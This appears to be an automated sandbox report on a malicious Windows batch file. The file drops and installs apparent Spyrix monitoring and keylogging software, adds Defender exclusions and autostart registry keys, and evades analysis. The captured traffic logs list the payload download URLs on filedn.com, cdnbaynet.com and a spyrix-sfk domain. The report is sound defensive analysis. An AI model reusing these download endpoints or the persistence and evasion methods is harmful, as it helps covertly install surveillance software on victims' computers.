Windows Analysis Report
c5WMpr1cOc.bat

Overview

General Information

Sample name:	c5WMpr1cOc.bat renamed because original name is a hash value
Original sample name:	201ba880456a79f7af54cb4aa5e9c008d8a1961e686acbac7b2f1343e697b7a9.bat
Analysis ID:	1523865
MD5:	1ff13790ed1131ef710192fd2a2957dd
SHA1:	96871befc62dbb9aca8910e25e3cdfa4f13d0feb
SHA256:	201ba880456a79f7af54cb4aa5e9c008d8a1961e686acbac7b2f1343e697b7a9
Tags:	batfiledn-comuser-JAMESWT_MHT
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Adds a directory exclusion to Windows Defender

Creates an undocumented autostart registry key

Found API chain indicative of debugger detection

Found stalling execution ending in API Sleep call

Loading BitLocker PowerShell Module

PE file has nameless sections

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Uses cmd line tools excessively to alter registry or file data

Uses netstat to query active network connections and open ports

Uses regedit.exe to modify the Windows registry

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Wscript starts Powershell (via cmd or directly)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to communicate with device drivers

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to retrieve information about pressed keystrokes

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after checking a module file name)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTML body contains low number of good links

HTML body contains password input but no form action

HTML title does not match URL

HTTP GET or POST without a user agent

Installs a raw input device (often for capturing keystrokes)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries keyboard layouts

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Powershell Defender Exclusion

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Uses taskkill to terminate processes

Classification

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: c5WMpr1cOc.bat	Virustotal: Detection: 19%			Perma Link
Source: c5WMpr1cOc.bat	ReversingLabs: Detection: 26%

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D3C770 memset,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	67_2_00D3C770
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D3A91C strtol,strchr,strlen,strncpy,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strchr,strchr,strncmp,strncmp,strncmp,strncmp,strncmp,strncmp,strncmp,strncmp,strchr,strlen,CertOpenStore,CryptStringToBinaryA,CertFindCertificateInStore,CertCloseStore,CertFreeCertificateContext,CertFreeCertificateContext,GetLastError,	67_2_00D3A91C
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D39BC0 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	67_2_00D39BC0

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: -----BEGIN PUBLIC KEY-----		67_2_00D38FA0
Source: qrl.exe	Binary or memory string: -----BEGIN PUBLIC KEY-----

HTML body contains low number of good links

Source: https://dashboard.spyrix.com/login

HTTP Parser: Number of links: 0

HTML body contains password input but no form action

Source: https://dashboard.spyrix.com/login

HTTP Parser: <input type="password" .../> found but no <form action="...

HTML title does not match URL

Source: https://dashboard.spyrix.com/login

HTTP Parser: Title: Welcome Back does not match URL

Source: https://dashboard.spyrix.com/login

HTTP Parser: <input type="password" .../> found

Source: https://dashboard.spyrix.com/login

HTTP Parser: No <meta name="author".. found

Source: https://dashboard.spyrix.com/login

HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 23.109.93.100:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.109.93.100:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.114.14.170:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.114.14.168:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49751 version: TLS 1.2

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_0040AC68 FindFirstFileW,FindClose,	53_2_0040AC68
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_0040A700 lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,	53_2_0040A700
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033C75E8 FindFirstFileA,	53_2_033C75E8
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033C76C4 FindFirstFileA,GetLastError,	53_2_033C76C4

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov eax, edx	67_2_00D2B510
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then cmp dword ptr [edi+04h], ebp	67_2_00D248F0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push esi	67_2_00D220F0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then add eax, dword ptr [ecx+10h]	67_2_00D8C0F0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then movzx edx, byte ptr [ecx]	67_2_00D85060
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov ecx, eax	67_2_00D7F270
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push dword ptr [ebx]	67_2_00D333B0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	67_2_00D26370
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov edi, dword ptr [ebx]	67_2_00D27360
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov byte ptr [edx], cl	67_2_00D65360
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	67_2_00D274E0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	67_2_00D276C1
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 0000000Ch	67_2_00D336A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000019h	67_2_00D336A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	67_2_00D27641
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	67_2_00D277DB
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	67_2_00D2774F
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	67_2_00D27771
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov ebx, dword ptr [edi-04h]	67_2_00D7E8A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	67_2_00D278AB
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	67_2_00D2785D
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	67_2_00D27828
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	67_2_00D279B7
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	67_2_00D27959
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	67_2_00D27924
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov ebx, ebp	67_2_00D3DAD0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	67_2_00D3DAD0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then test ebp, ebp	67_2_00D38AE0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	67_2_00D27A9B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	67_2_00D27A5E
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov eax, dword ptr [edi]	67_2_00D15A00
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then test ebp, ebp	67_2_00D38BD0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	67_2_00D27B8D
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	67_2_00D27BAC
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov ebx, dword ptr [esi]	67_2_00D53C90
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then cmp esi, edi	67_2_00D66C00
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov ebp, dword ptr [ebx+58h]	67_2_00D7ADE0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	67_2_00D27D8F
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov edx, dword ptr [esp+74h]	67_2_00D3BD50
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push dword ptr [edi]	67_2_00D68EF0

Networking

Uses netstat to query active network connections and open ports

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat.exe -e

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/s108 HTTP/1.1Host: filedn.comConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

Code function: 67_2_00D473D0 recv,send,WSAGetLastError,

67_2_00D473D0

Source: global traffic	HTTP traffic detected: GET /lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404 HTTP/1.1Host: filedn.comUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/s108 HTTP/1.1Host: filedn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /loader/link.php?prg_id=sfk HTTP/1.1Host: cdnbaynet.comUser-Agent: sfk-dst-loader-2.0Accept: /
Source: global traffic	HTTP traffic detected: GET /download/sfk/sfk_setup.exe HTTP/1.1Host: swtb-download.spyrix-sfk.comUser-Agent: sfk-dst-loader-2.0Accept: /
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=cT+9XekNm5bPwLf&MD=3TyOahlY HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=cT+9XekNm5bPwLf&MD=3TyOahlY HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: dashboard.spyrix.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/index-004f4025.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/index-93c74fef.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn.js HTTP/1.1Host: dashboard.spyrix.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/index-004f4025.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: dashboard.spyrix.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn.js HTTP/1.1Host: dashboard.spyrix.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/en-08b2a987.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://cdn.cdndownload.net/dashboard30/assets/index-004f4025.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: dashboard.spyrix.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Nunito-Regular-73dcaa51.woff2 HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdn.cdndownload.net/dashboard30/assets/index-93c74fef.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/en-5393c481.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://cdn.cdndownload.net/dashboard30/assets/index-004f4025.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ConfirmPhoneModal-86d79a8a.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/en-ef960fb7.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://cdn.cdndownload.net/dashboard30/assets/index-004f4025.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Button-ca236c00.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
